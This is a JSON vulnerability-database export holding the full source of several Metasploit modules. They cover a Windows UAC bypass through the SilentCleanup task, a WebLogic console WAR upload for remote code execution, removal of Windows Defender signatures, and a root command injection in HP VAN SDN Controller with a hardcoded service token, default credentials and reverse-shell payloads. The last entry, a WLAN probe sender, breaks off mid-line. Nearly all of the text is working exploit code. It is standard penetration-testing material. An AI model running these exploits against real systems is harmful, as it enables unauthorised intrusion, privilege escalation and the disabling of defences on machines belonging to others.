{"metasploit": [{"lastseen": "2019-11-18T12:54:30", "bulletinFamily": "exploit", "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.\n", "modified": "2019-07-02T17:36:07", "published": "2019-06-20T17:53:54", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SILENTCLEANUP", "href": "", "type": "metasploit", "title": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::Powershell\n include Msf::Post::Windows::Priv\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',\n 'Description' => %q{\n There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'tyranid', # Discovery\n 'enigma0x3', # Discovery\n 'nyshone69', # Discovery\n 'lokiuox', # PSH script\n 'Carter Brainerd (cbrnrd)' # Metasploit Module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter', 'shell'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Microsoft Windows', {}]],\n 'DisclosureDate' => 'Feb 24 2019',\n 'References' => [\n ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],\n ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],\n ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],\n ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']\n ]\n ))\n\n register_options(\n [\n OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),\n OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"])\n ])\n end\n\n def get_bypass_script(cmd)\n scr = %Q{\n if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\")) {\n #{cmd}\n } else {\n $registryPath = \"HKCU:\\\\Environment\"\n $Name = \"windir\"\n $Value = \"powershell -ExecutionPolicy bypass -windowstyle hidden -Command `\"& `'$PSCommandPath`'`\";#\"\n Set-ItemProperty -Path $registryPath -Name $name -Value $Value\n #Depending on the performance of the machine, some sleep time may be required before or after schtasks\n Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}\n schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I | Out-Null\n Remove-ItemProperty -Path $registryPath -Name $name\n }\n }\n vprint_status(scr)\n scr\n end\n\n def exploit\n check_permissions\n\n e_vars = get_envs('TEMP')\n payload_fp = \"#{e_vars['TEMP']}\\\\#{rand_text_alpha(8)}.ps1\"\n\n # Write it to disk, run, delete\n upload_payload_ps1(payload_fp)\n vprint_good(\"Payload uploaded to #{payload_fp}\")\n\n cmd_exec(\"#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}\")\n end\n\n def check_permissions\n # Check if you are an admin\n case is_in_admin_group?\n when nil\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n when true\n print_good('Part of Administrators group! Continuing...')\n when false\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\n\n def upload_payload_ps1(filepath)\n pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\n begin\n vprint_status('Uploading payload PS1...')\n write_file(filepath, get_bypass_script(pld))\n register_file_for_cleanup(filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{filepath}: #{e.class} #{e}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_silentcleanup.rb"}, {"lastseen": "2019-11-30T10:27:56", "bulletinFamily": "exploit", "description": "This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a \"oats\" account that you could log in with, which grants you administrator access.\n", "modified": "2019-05-24T15:06:47", "published": "2019-05-10T18:27:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',\n 'Description' => %q{\n This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Used the trick and told me about it\n 'sinn3r' # Metasploit module\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'WebLogic Server Administration Console 12 or prior', { } ]\n ],\n 'References' =>\n [\n # The CVE description matches what this exploit is doing, but it was for version\n # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.\n # ['CVE', '2007-2699']\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'Notes' =>\n {\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 13 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),\n OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),\n OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])\n ])\n\n register_advanced_options(\n [\n OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\\\OracleATS'])\n ])\n end\n\n class LoginSpec\n attr_accessor :admin_console_session\n end\n\n def login_spec\n @login_spec ||= LoginSpec.new\n end\n\n class OatsWarPayload < MetasploitModule\n attr_reader :name\n attr_reader :war\n\n def initialize(payload)\n @name = [Faker::App.name, Rex::Text.rand_name].sample\n @war = payload.encoded_war(app_name: name).to_s\n end\n end\n\n def default_oats_path\n datastore['DefaultOatsPath']\n end\n\n def war_payload\n @war_payload ||= OatsWarPayload.new(payload)\n end\n\n def set_frsc\n value = get_deploy_frsc\n @frsc = value\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n })\n\n if res && res.body.include?('Oracle WebLogic Server Administration Console')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def set_admin_console_session(res)\n cookie = res.get_cookies\n admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first\n vprint_status(\"Token for console session is: #{admin_console_session}\")\n login_spec.admin_console_session = admin_console_session\n end\n\n def is_logged_in?(res)\n html = res.get_html_document\n a_element = html.at('a')\n if a_element.respond_to?(:attributes) && a_element.attributes['href']\n link = a_element.attributes['href'].value\n return URI(link).request_uri == '/console'\n end\n\n false\n end\n\n def do_login\n uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n set_admin_console_session(res)\n\n uri = normalize_uri(target_uri.path, 'console', 'j_security_check')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_post' =>\n {\n 'j_username' => datastore['OATSUSERNAME'],\n 'j_password' => datastore['OATSPASSWORD'],\n 'j_character_encoding' => 'UTF-8'\n }\n })\n\n fail_with(Failure::Unknown, 'No response while trying to log in') unless res\n fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n set_admin_console_session(res)\n end\n\n def get_deploy_frsc\n # First we are just going through the pages in a specific order to get the FRSC value\n # we need to prepare uploading the WAR file.\n res = nil\n requests =\n [\n { path: 'console/', vars: {} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\"} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\", '_pageLabel' => 'HomePage1'} }\n ]\n\n requests.each do |req|\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, req[:path]),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' => req[:vars]\n })\n\n fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res\n end\n\n html = res.get_html_document\n hidden_input = html.at('input[@name=\"ChangeManagerPortletfrsc\"]')\n frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil\n frsc_attr ? frsc_attr.value : ''\n end\n\n def do_select_upload_action\n action = '/com/bea/console/actions/app/install/selectUploadApp'\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\\\servers\\\\AdminServer\\\\upload')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_upload_app_action\n action = '/com/bea/console/actions/app/install/uploadApp'\n ctype = 'application/octet-stream'\n app_cname = 'AppApplicationInstallPortletuploadAppPath'\n plan_cname = 'AppApplicationInstallPortletuploadPlanPath'\n frsc_cname = 'AppApplicationInstallPortletfrsc'\n war = war_payload.war\n war_name = war_payload.name\n post_data = Rex::MIME::Message.new\n post_data.add_part(war, ctype, 'binary', \"form-data; name=\\\"#{app_cname}\\\"; filename=\\\"#{war_name}.war\\\"\")\n post_data.add_part('', ctype, nil, \"form-data; name=\\\"#{plan_cname}\\\"; filename=\\\"\\\"\")\n post_data.add_part(frsc, nil, nil, \"form-data; name=\\\"#{frsc_cname}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_app_select_action\n action = '/com/bea/console/actions/app/install/appSelected'\n war_name = war_payload.name\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, \"oats\\\\servers\\\\AdminServer\\\\upload\\\\#{war_name}.war\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_style_select_action\n action = '/com/bea/console/actions/app/install/targetStyleSelected'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortlettargetStyle' => 'Application',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_finish_action\n action = '/com/bea/console/actions/app/install/finish'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletname' => war_payload.name,\n 'AppApplicationInstallPortletsecurityModel' => 'DDOnly',\n 'AppApplicationInstallPortletstagingStyle' => 'Default',\n 'AppApplicationInstallPortletplanStagingStyle' => 'Default',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n\n # 302 is a good enough indicator of a successful upload, otherwise\n # the server would actually return a 200 with an error message.\n res.code == 302\n end\n\n def print_response_message(res)\n html = res.get_html_document\n message_div = html.at('div[@class=\"message\"]')\n if message_div\n msg = message_div.at('span').text\n print_status(\"Server replies: #{msg.inspect}\")\n end\n end\n\n def deploy_war\n set_frsc\n print_status(\"FRSC value: #{frsc}\")\n do_select_upload_action\n do_upload_app_action\n do_app_select_action\n do_style_select_action\n do_finish_action\n end\n\n def goto_war(name)\n print_good(\"Operation \\\"#{name}\\\" is a go!\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, name)\n })\n\n print_status(\"Code #{res.code} on \\\"#{name}\\\" request\") if res\n end\n\n def undeploy_war\n war_name = war_payload.name\n handle = 'com.bea.console.handles.JMXHandle(\"com.bea:Name=oats,Type=Domain\")'\n contents = %Q|com.bea.console.handles.AppDeploymentHandle(\"com.bea:Name=#{war_name},Type=AppDeployment\")|\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',\n 'AppDeploymentsControlPortlethandle' => handle\n },\n 'vars_post' =>\n {\n # For some reason, the value given to the server is escapped twice.\n # The Metasploit API should do it at least once.\n 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),\n '_pageLabel' => 'AppApplicationUninstallPage',\n '_nfpb' => 'true',\n 'AppApplicationUninstallPortletfrsc' => frsc\n }\n })\n\n if res && res.code == 302\n print_good(\"Successfully undeployed #{war_name}.war\")\n else\n print_warning(\"Unable to successfully undeploy #{war_name}.war\")\n print_warning('You may want to do so manually.')\n end\n end\n\n def cleanup\n undeploy_war if is_cleanup_ready\n super\n end\n\n def setup\n @is_cleanup_ready = false\n super\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n print_status('Target does not have the login page we are looking for.')\n return\n end\n\n do_login\n print_good(\"Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}\")\n print_status(\"Ready for war. Codename \\\"#{war_payload.name}\\\" at #{war_payload.war.length} bytes\")\n result = deploy_war\n if result\n @is_cleanup_ready = true\n goto_war(war_payload.name)\n end\n end\n\n attr_reader :frsc\n attr_reader :is_cleanup_ready\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oats_weblogic_console.rb"}, {"lastseen": "2019-11-24T21:33:06", "bulletinFamily": "exploit", "description": "This module with appropriate rights let to use the Windows Defender command-line utility a run and automation tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine. The tool is prominently used for scheduling scans and updating the signature or definition files, but there is a switch created to restore the installed signature definitions to a previous backup copy or to the original default set of signatures which is none, disabling all the signatures and allowing malware to execute even with the Windows Defender solution enabled.\n", "modified": "2018-11-30T22:41:40", "published": "2018-11-30T21:20:34", "id": "MSF:POST/WINDOWS/MANAGE/ROLLBACK_DEFENDER_SIGNATURES", "href": "", "type": "metasploit", "title": "Disable Windows Defender Signatures", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Registry\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Disable Windows Defender Signatures',\n 'Description' => %q{\n This module with appropriate rights let to use the Windows Defender command-line utility a run and automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['metasploit@[at]csiete.org',\n 'luisco100 <luisco100[at]gmail.com>'], # Module author\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n ))\n register_options(\n [\n OptEnum.new('ACTION', [ true, 'Action to perform (Update/Rollback)', 'Rollback', ['rollback', 'update']])\n ])\n end\n\n def run\n #Are we system?\n if not is_system?()\n fail_with(Failure::NoAccess, \"You must be System to run this Module\")\n end\n #Is the binary there?\n program_path = session.sys.config.getenv('ProgramFiles')\n vprint_status(\"program_path = #{program_path}\")\n file_path = program_path + '\\Windows Defender\\MpCmdRun.exe'\n vprint_status(\"file_path = #{file_path}\")\n if not exist?(file_path)\n fail_with(Failure::NoAccess, \"#{file_path} is not Present\")\n end\n #Is defender even enabled?\n defender_disable_key = \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\"\n disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, \"DisableAntiSpyware\", REGISTRY_VIEW_NATIVE)\n if disable_key_value.nil? || disable_key_value != 1\n print_status(\"Removing All Definitions for Windows Defender\")\n print_status(datastore['ACTION'])\n if datastore['ACTION'].casecmp('Rollback') == 0\n cmd = \"cmd.exe /c \\\"#{file_path}\\\" -RemoveDefinitions -All\"\n else\n cmd = \"cmd.exe /c \\\"#{file_path}\\\" -SignatureUpdate\"\n end\n print_status(\"Running #{cmd}\")\n output = cmd_exec(cmd)\n if output.include?('denied')\n print_bad(\"#{output}\")\n else\n print_status(\"#{output}\")\n end\n else\n fail_with(Failure::BadConfig, \"Defender is not Enabled\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/rollback_defender_signatures.rb"}, {"lastseen": "2019-11-29T20:34:25", "bulletinFamily": "exploit", "description": "This module exploits a hardcoded service token or default credentials in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. A root command injection was discovered in the uninstall action's name parameter, obviating the need to use sudo for privilege escalation. If the service token option TOKEN is blank, USERNAME and PASSWORD will be used for authentication. An additional login request will be sent.\n", "modified": "2019-06-24T18:38:14", "published": "2018-07-05T18:30:55", "id": "MSF:EXPLOIT/LINUX/HTTP/HP_VAN_SDN_CMD_INJECT", "href": "", "type": "metasploit", "title": "HP VAN SDN Controller Root Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n # server: grizzly/2.2.16\n HttpFingerprint = {pattern: [/^grizzly/]}\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP VAN SDN Controller Root Command Injection',\n 'Description' => %q{\n This module exploits a hardcoded service token or default credentials\n in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.\n\n A root command injection was discovered in the uninstall action's name\n parameter, obviating the need to use sudo for privilege escalation.\n\n If the service token option TOKEN is blank, USERNAME and PASSWORD will\n be used for authentication. An additional login request will be sent.\n },\n 'Author' => [\n 'Matt Bergin', # Vulnerability discovery and Python exploit\n 'wvu' # Metasploit module and additional ~research~\n ],\n 'References' => [\n ['EDB', '44951'],\n ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt']\n ],\n 'DisclosureDate' => '2018-06-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'Payload' => {'BadChars' => ' '},\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}\n ],\n ['Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'SSL' => true}\n ))\n\n register_options([\n OptPort.new('RPORT', [true, 'REST API port', 8081]),\n OptPort.new('WEBUI_PORT', [true, 'Web UI port for creds login', 8443]),\n OptString.new('TOKEN', [false, 'Service token', 'AuroraSdnToken37']),\n OptString.new('USERNAME', [false, 'Service username', 'sdn']),\n OptString.new('PASSWORD', [false, 'Service password', 'skyline'])\n ])\n\n register_advanced_options([\n OptString.new('PayloadName', [false, 'Payload name (random if unset)']),\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_credential?\n true\n end\n\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/',\n 'headers' => {'X-Auth-Token' => auth_token},\n 'ctype' => 'application/json',\n 'data' => {'action' => 'uninstall'}.to_json\n )\n\n if res.nil?\n checkcode = CheckCode::Unknown\n elsif res && res.code == 400 && res.body.include?('Missing field: name')\n checkcode = CheckCode::Appears\n elsif res && res.code == 401 && res.body =~ /Missing|Invalid token/\n checkcode = CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n if [CheckCode::Safe, CheckCode::Unknown].include?(check)\n if datastore['ForceExploit']\n print_warning('ForceExploit set! Exploiting anyway!')\n else\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n end\n\n if target['Type'] == :unix_memory\n print_status('Executing command payload')\n execute_command(payload.encoded)\n return\n end\n\n print_status('Uploading payload as fake .deb')\n payload_path = upload_payload\n renamed_path = payload_path.gsub(/\\.deb$/, '')\n\n register_file_for_cleanup(renamed_path)\n\n print_status('Renaming payload and executing it')\n execute_command(\n \"mv #{payload_path} #{renamed_path} && \" \\\n \"chmod +x #{renamed_path}\"\n )\n execute_command(renamed_path)\n end\n\n def upload_payload\n payload_name = datastore['PayloadName'] ?\n \"#{datastore['PayloadName']}.deb\" :\n \"#{Rex::Text.rand_text_alphanumeric(8..42)}.deb\"\n payload_path = \"/var/lib/sdn/uploads/#{payload_name}\"\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/upload',\n 'headers' => {'Filename' => payload_name, 'X-Auth-Token' => auth_token},\n 'ctype' => 'application/octet-stream',\n 'data' => generate_payload_exe\n )\n\n unless res && res.code == 200 && res.body.include?('{ }')\n fail_with(Failure::UnexpectedReply, \"Failed to upload #{payload_path}\")\n end\n\n print_good(\"Uploaded #{payload_path}\")\n\n payload_path\n end\n\n def execute_command(cmd)\n # Argument injection in /opt/sdn/admin/uninstall-dpkg\n injection = \"--pre-invoke=#{cmd}\"\n\n # Ensure we don't undergo word splitting\n injection = injection.gsub(/\\s+/, '${IFS}')\n\n print_status(\"Injecting dpkg -r #{injection}\")\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => '/',\n 'headers' => {'X-Auth-Token' => auth_token},\n 'ctype' => 'application/json',\n 'data' => {'action' => 'uninstall', 'name' => injection}.to_json\n }, 0)\n end\n\n def auth_token\n return @auth_token if @auth_token\n\n token = datastore['TOKEN']\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n if token && !token.empty?\n print_status(\"Authenticating with service token #{token}\")\n @auth_token = token\n return @auth_token\n end\n\n print_status(\"Authenticating with creds #{username}:#{password}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/sdn/ui/app/login',\n 'rport' => datastore['WEBUI_PORT'],\n 'vars_post' => {'username' => username, 'password' => password}\n )\n\n unless res && res.get_cookies.include?('X-Auth-Token')\n print_error('Invalid username and/or password specified')\n return\n end\n\n @auth_token = res.get_cookies_parsed['X-Auth-Token'].first\n print_good(\"Retrieved auth token #{@auth_token}\")\n\n @auth_token\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb"}, {"lastseen": "2019-11-30T16:33:30", "bulletinFamily": "exploit", "description": "This module send probe requests through the wlan interface. The ESSID field will be use to set a custom message.\n", "modified": "2018-05-03T09:41:09", "published": "2018-04-11T14:43:33", "id": "MSF:POST/WINDOWS/WLAN/WLAN_PROBE_REQUEST", "href": "", "type": "metasploit", "title": "Windows Send Probe Request Packets", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Send Probe Request Packets',\n 'Description' => %q{\n This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options(\n [\n OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),\n OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])\n ])\n end\n\n def run\n ssid = datastore['SSID']\n time = datastore['TIMEOUT']\n\n if ssid.length > 32\n print_error(\"The SSID must be equal to or less than 32 bytes\")\n return\n end\n\n mypid = client.sys.process.getpid\n @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)\n @wlanapi = client.railgun.wlanapi\n\n wlan_handle = open_handle()\n unless wlan_handle\n print_error(\"Couldn't open WlanAPI Handle. WLAN API may not be installed on target\")\n print_error(\"On Windows XP this could also mean the Wireless Zero Configuration Service is turned off\")\n return\n end\n\n # typedef struct _DOT11_SSID {\n # ULONG uSSIDLength;\n # UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];\n # } DOT11_SSID, *PDOT11_SSID;\n pDot11Ssid = [ssid.length].pack(\"L<\") << ssid\n wlan_iflist = enum_interfaces(wlan_handle)\n if wlan_iflist.length == 0\n print_status(\"Wlan interfaces not found\")\n return\n end\n\n print_status(\"Wlan interfaces found: #{wlan_iflist.length}\")\n print_status(\"Sending probe requests for #{time} seconds\")\n begin\n ::Timeout.timeout(time) do\n while true\n wlan_iflist.each do |interface|\n vprint_status(\"Interface Guid: #{interface['guid'].unpack('H*')[0]}\")\n vprint_status(\"Interface State: #{interface['state']}\")\n vprint_status(\"DOT11_SSID payload: #{pDot11Ssid.chars.map {|c| c.ord.to_s(16) }.join(':')}\")\n @wlanapi.WlanScan(wlan_handle,interface['guid'],pDot11Ssid,nil,nil)\n sleep(10)\n end\n end\n end\n rescue ::Timeout::Error\n closehandle = @wlanapi.WlanCloseHandle(wlan_handle,nil)\n if closehandle['return'] == 0\n print_status(\"WlanAPI Handle closed successfully\")\n else\n print_error(\"There was an error closing the Handle\")\n end\n end\n end\n\n # Function borrowed from @theLightCosine wlan_* modules\n def open_handle\n begin\n wlhandle = @wlanapi.WlanOpenHandle(2,nil,4,4)\n rescue\n return nil\n end\n return wlhandle['phClientHandle']\n end\n\n # Function borrowed from @theLightCosine wlan_* modules\n def enum_interfaces(wlan_handle)\n\n iflist = @wlanapi.WlanEnumInterfaces(wlan_handle,nil,4)\n pointer= iflist['ppInterfaceList']\n\n numifs = @host_process.memory.read(pointer,4)\n numifs = numifs.unpack(\"V\")[0]\n\n interfaces = []\n\n #Set the pointer ahead to the first element in the array\n pointer = (pointer + 8)\n (1..numifs).each do |i|\n interface = {}\n #Read the GUID (16 bytes)\n interface['guid'] = @host_process.memory.read(pointer,16)\n pointer = 